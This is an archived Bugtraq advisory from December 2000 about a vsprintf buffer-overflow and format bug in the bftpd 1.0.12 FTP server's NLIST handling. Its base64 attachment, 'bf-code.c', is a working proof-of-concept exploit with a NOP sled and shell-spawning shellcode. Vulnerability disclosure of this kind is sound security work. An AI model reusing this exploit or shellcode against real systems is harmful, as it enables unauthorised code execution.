![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Wed, 6 Dec 2000 19:11:58 +0100
From: asynchro <asynchro@PKCREW.ORG>
Subject: Malformed vsprintf in bftpd
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--8323328-908163786-976126318=:695
Content-Type: TEXT/PLAIN; charset=US-ASCII
There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
when the function is called from NLIST command:
else
foo = 1;
sendstrf(s, entry->d_name);
}
This can be used to overflow the buffer of the vsprintf and execute
arbitrary code. I don't think it can be normally used for a remote attack
because bftpd removes all non-printable characters from input strings and
so it is not possible to remotely put a shellcode in a filename.
A dimostrative code is attached.
asynchro@pkcrew.org
www.pkcrew.org
--8323328-908163786-976126318=:695
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="bf-code.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.20.0012061911580.695@localhost.localdomain>
Content-Description:
Content-Disposition: attachment; filename="bf-code.c"
LyoNCkNyZWF0ZXMgYSBmaWxuYW1lIHRvIGV4cGxvaXQgdGhlIGJ1ZyBpbiBi
ZnRwZCAxLjAuMTINCkNyZWF0ZSB0aGUgZmlsZSwgY3dkIGluIHRoZSBzaGVs
bCBkaXJlY3RvcnkgYW5kIG5saXN0IHRoZSBmaWxlIGRpcmVjdG9yeQ0KKHNo
IGlzIGV4ZWN1dGVkIGluIHRoZSB3b3JraW5nIGRpciBiZWNhdXNlIGl0IGlz
IG5vdCBwb3NzaWJsZSB0byBpbnNlcnQgYSAvIGluDQp0aGUgZmlsZW5hbWUp
DQoNCmhpbnRzIGJ5IHxDeVJhWHwgJiBDdGh1bGh1DQpjb2RlZCBieSBhc3lu
Y2hybw0KDQp3d3cucGtjcmV3Lm9yZw0KKi8NCg0KI2luY2x1ZGUgPHN0ZGxp
Yi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KDQojZGVmaW5lIEJVRlNJWkUg
NTEyDQojZGVmaW5lIE5PUCAxMjQNCg0KbWFpbigpDQp7DQppbnQgaTsNCmNo
YXIgKmJ1ZmY7DQpjaGFyIG5vcD0weDkwOw0KY2hhciBhZGRyW109Ilx4ZDRc
eGY5XHhmZlx4YmYiOw0KY2hhciBjb21tYW5kW109InRvdWNoICUuMjYweCI7
DQpjaGFyIHNoZWxsY29kZVtdPQ0KDQoiXHhlYlx4MWZceDVlXHg4OVx4NzZc
eDA4XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg0Nlx4MGNceGIwXHgwYiIN
CiJceDg5XHhmM1x4OGRceDRlXHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgz
MVx4ZGJceDg5XHhkOFx4NDBceGNkIg0KIlx4ODBceGU4XHhkY1x4ZmZceGZm
XHhmZnNoIjsNCg0KDQpidWZmPShjaGFyICopIG1hbGxvYyhCVUZTSVpFKTsN
Cm1lbXNldChidWZmLDB4MCxCVUZTSVpFKTsNCm1lbWNweShidWZmLGNvbW1h
bmQsc2l6ZW9mKGNvbW1hbmQpKTsNCg0Kc3RybmNhdChidWZmLGFkZHIsNCk7
DQpzdHJuY2F0KGJ1ZmYsYWRkciw0KTsNCg0KZm9yKGk9MDsgaSA8IE5PUCA7
aSsrKQ0Kew0Kc3RybmNhdChidWZmLCZub3AsMSk7DQp9DQoNCnN0cm5jYXQo
YnVmZixzaGVsbGNvZGUsc3RybGVuKHNoZWxsY29kZSkpOw0Kc3lzdGVtKGJ1
ZmYpOw0KfQ0K
--8323328-908163786-976126318=:695--